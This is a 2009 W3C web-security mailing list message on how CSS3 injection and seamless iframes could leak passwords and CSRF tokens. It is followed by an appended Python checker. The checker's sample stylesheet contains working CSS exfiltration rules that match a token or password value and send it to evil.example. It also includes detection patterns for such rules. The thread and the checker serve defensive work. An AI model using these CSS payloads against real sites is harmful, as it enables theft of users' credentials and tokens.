- From: Adam Barth <w3c@adambarth.com>
- Date: Sat, 5 Dec 2009 10:17:35 -0800
- To: "sird@rckc.at" <sird@rckc.at>
- Cc: Collin Jackson <w3c@collinjackson.com>, public-web-security@w3.org
I think Collin's point about the CSRF tokens is that they tend to be on every page anyway.

Adam

On Sat, Dec 5, 2009 at 10:16 AM, sird@rckc.at <sird@rckc.at> wrote:
> Collin, this attack allows you to steal nonces, making CSRF protections less
> efficient. Seamless iframes make this work on ALL of the domain/origin.
>
> Greetings.
>
> On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote:
>
> A few thoughts:
>
> * The password stealing attack can already be accomplished using the
> iframe to create a login page and prompting the user to type their
> password. It's not necessary to use CSS3 or seamless.
> * If the password manager is used, CSS3 + seamless lets you steal the
> password without user interaction.
> * However, if you can inject arbitrary CSS3 and a seamless iframe into
> a page, there's a good chance you can inject a password field, so this
> password manager attack doesn't require seamless, just CSS3.
> * Many webapps include a CSRF token in every page as a hidden form
> field. If the page that allows CSS3 injection includes such a token,
> you don't need seamless iframes to steal the token.
>
> It seems like CSS3 is adding a lot of attack surface; sites may need
> to block arbitrary CSS3 injection regardless of seamless. That is
> unfortunate since browser vendors have been removing expression,
> -moz-binding, and other features that make CSS injection dangerous.
>
> On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see. The issue is that t...
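As an added illustration, not code from this thread or from any W3C project: a small Python check of the kind a site would need if it accepts user-supplied CSS, flagging rules that pair a selector on an element's `value` attribute with a fetch from another host, which is what lets CSS3 alone leak a hidden CSRF token or an autofilled password as Collin describes. The sample stylesheet, the host names and the function names are all constructed for the example.

```python
import re

# Constructed sample of user-supplied CSS (not from the thread). The first two
# rules are harmless styling; the last two match a field's value one character
# at a time and report each match to another host through url().
SAMPLE_CSS = """
.profile h1 { color: #336699; font-size: 2em; }
a.badge { background: url(/static/badge.png) }
input[name=csrf_token][value^="a"] { background: url(//evil.example/t?c=a) }
input[type=password][value$="z"] { background-image: url("//evil.example/p?z") }
"""

# [attr op value] with any CSS3 match operator (=, ~=, |=, ^=, $=, *=)
ATTR_MATCH = re.compile(
    r'\[\s*([\w-]+)\s*([~|^$*]?=)\s*("[^"]*"|\'[^\']*\'|[^\]]+)\s*\]')
# url() pointing at another host (scheme-relative or absolute http/https)
EXTERNAL_URL = re.compile(r'url\(\s*["\']?\s*(?:https?:)?//', re.I)


def split_rules(css):
    """Yield (selector, declarations) pairs; comments are stripped first."""
    css = re.sub(r'/\*.*?\*/', '', css, flags=re.S)
    for chunk in css.split('}'):
        if '{' not in chunk:
            continue
        selector, _, body = chunk.partition('{')
        yield selector.strip(), body.strip()


def find_exfil_rules(css):
    """Return the selectors of rules that combine a value-matching attribute
    selector with an external fetch: the signature of CSS-only value leakage.
    A site accepting user CSS would reject the stylesheet if this is non-empty."""
    findings = []
    for selector, body in split_rules(css):
        attrs = ATTR_MATCH.findall(selector)
        matches_value = any(name.lower() == 'value' for name, _, _ in attrs)
        if matches_value and EXTERNAL_URL.search(body):
            findings.append(selector)
    return findings


if __name__ == "__main__":
    for sel in find_exfil_rules(SAMPLE_CSS):
        print("reject:", sel)
```

Same-origin `url()` references and attribute selectors on non-sensitive attributes pass, so ordinary theming is unaffected; the check is deliberately narrow and is no substitute for refusing arbitrary CSS where the page carries secrets.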
Received on Saturday, 5 December 2009 18:18:28 UTC